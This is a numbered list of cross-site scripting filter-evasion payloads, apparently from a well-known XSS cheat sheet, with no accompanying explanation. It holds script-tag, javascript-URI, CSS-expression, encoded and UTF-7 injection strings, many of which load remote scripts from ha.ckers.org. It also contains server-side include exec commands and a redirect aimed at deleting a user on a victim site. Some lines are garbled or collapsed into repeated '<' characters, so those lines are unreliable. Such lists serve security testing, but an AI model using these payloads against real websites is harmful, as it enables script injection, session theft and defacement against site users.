LOL
173 | LOL
174 |
175 |
176 | <SCRIPT>alert(/XSS/.source)</SCRIPT>
177 | \\";alert('XSS');//
178 | </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
179 | <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
180 | <BODY BACKGROUND=\"javascript:alert('XSS')\">
181 | <BODY ONLOAD=alert('XSS')>
182 | <IMG DYNSRC=\"javascript:alert('XSS')\">
183 | <IMG LOWSRC=\"javascript:alert('XSS')\">
184 | <BGSOUND SRC=\"javascript:alert('XSS');\">
185 | <BR SIZE=\"&{alert('XSS')}\">
186 | <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
187 | <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
188 | <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
189 | <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
190 | <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
191 | <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
192 | <XSS STYLE=\"behavior: url(xss.htc);\">
193 | <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
194 | <IMG SRC='vbscript:msgbox(\"XSS\")'>
195 | <IMG SRC=\"mocha:[code]\">
196 | <IMG SRC=\"livescript:[code]\">
197 | žscriptualert(EXSSE)ž/scriptu
198 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
199 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
200 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
201 | <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
202 | <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
203 | <TABLE BACKGROUND=\"javascript:alert('XSS')\">
204 | <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
205 | <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
206 | <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
207 | <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
208 | <DIV STYLE=\"width: expression(alert('XSS'));\">
209 | <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
210 | <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
211 | <XSS STYLE=\"xss:expression(alert('XSS'))\">
212 | exp/*<A STYLE='no\xss:noxss(\"*//*\");
213 | xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
214 | <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
215 | <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
216 | <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
217 | <!--[if gte IE 4]>
218 | <SCRIPT>alert('XSS');</SCRIPT>
219 | <![endif]-->
220 | <BASE HREF=\"javascript:alert('XSS');//\">
221 | <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
222 | <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
223 | <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
224 | <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
225 | a=\"get\";
226 | b=\"URL(\\"\";
227 | c=\"javascript:\";
228 | d=\"alert('XSS');\\")\";
229 | eval(a+b+c+d);
230 | <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
231 | <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
232 | </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
233 | <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
234 | <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
235 | <XML SRC=\"xsstest.xml\" ID=I></XML>
236 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
237 | <HTML><BODY>
238 | <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
239 | <?import namespace=\"t\" implementation=\"#default#time2\">
240 | <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
241 | </BODY></HTML>
242 | <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
243 | <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
244 | <? echo('<SCR)';
245 | echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
246 | <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
247 | Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
248 | <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
249 | <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
250 | <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
251 | <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
252 | <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
253 | <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
254 | <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
255 | <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
256 | <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
257 | <A HREF=\"http://66.102.7.147/\">XSS</A>
258 | <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
259 | <A HREF=\"http://1113982867/\">XSS</A>
260 | <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
261 | <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
262 | <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
263 | <A HREF=\"//www.google.com/\">XSS</A>
264 | <A HREF=\"//google\">XSS</A>
265 | <A HREF=\"http://ha.ckers.org@google\">XSS</A>
266 | <A HREF=\"http://google:ha.ckers.org\">XSS</A>
267 | <A HREF=\"http://google.com/\">XSS</A>
268 | <A HREF=\"http://www.google.com./\">XSS</A>
269 | <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
270 | <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
271 | <
272 | %3C
273 | <
274 | <
275 | <
276 | <
277 | <
278 | <
279 | <
280 | <
281 | <
282 | <
283 | <
284 | <
285 | <
286 | <
287 | <
288 | <
289 | <
290 | <
291 | <
292 | <
293 | <
294 | <
295 | <
296 | <
297 | <
298 | <
299 | <
300 | <
301 | <
302 | <
303 | <
304 | <
305 | <
306 | <
307 | <
308 | <
309 | <
310 | <
311 | <
312 | <
313 | <
314 | <
315 | <
316 | <
317 | <
318 | <
319 | <
320 | <
321 | <
322 | <
323 | <
324 | <
325 | <
326 | <
327 | <
328 | <
329 | <
330 | <
331 | <
332 | \x3c
333 | \x3C
334 | \u003c
335 | \u003C
336 | <iframe src=http://ha.ckers.org/scriptlet.html>
337 | <IMG SRC=\"javascript:alert('XSS')\"
338 | <SCRIPT SRC=//ha.ckers.org/.js>
339 | <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
340 | <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
341 | <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
342 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
343 | <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
344 | <IMG SRC=\" javascript:alert('XSS');\">
345 | perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
346 | perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
347 | <IMG SRC=\"jav
ascript:alert('XSS');\">
348 | <IMG SRC=\"jav
ascript:alert('XSS');\">
349 | <IMG SRC=\"jav ascript:alert('XSS');\">
350 | <IMG SRC=javascript:alert('XSS')>
351 | <IMG SRC=javascript:alert('XSS')>
352 | <IMG SRC=javascript:alert('XSS')>
353 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
354 | <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
355 | <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
356 | <IMG SRC=javascript:alert("XSS")>
357 | <IMG SRC=JaVaScRiPt:alert('XSS')>
358 | <IMG SRC=javascript:alert('XSS')>
359 | <IMG SRC=\"javascript:alert('XSS');\">
360 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
361 | '';!--\"<XSS>=&{()}
362 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
363 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
364 | '';!--"
=&{()}
365 |
366 |
367 |
368 |
369 |
370 |
">
371 |
372 |
373 |
374 | <
375 |
376 | \";alert('XSS');//
377 |
378 | ¼script¾alert(¢XSS¢)¼/script¾
379 |
380 |
381 |
382 |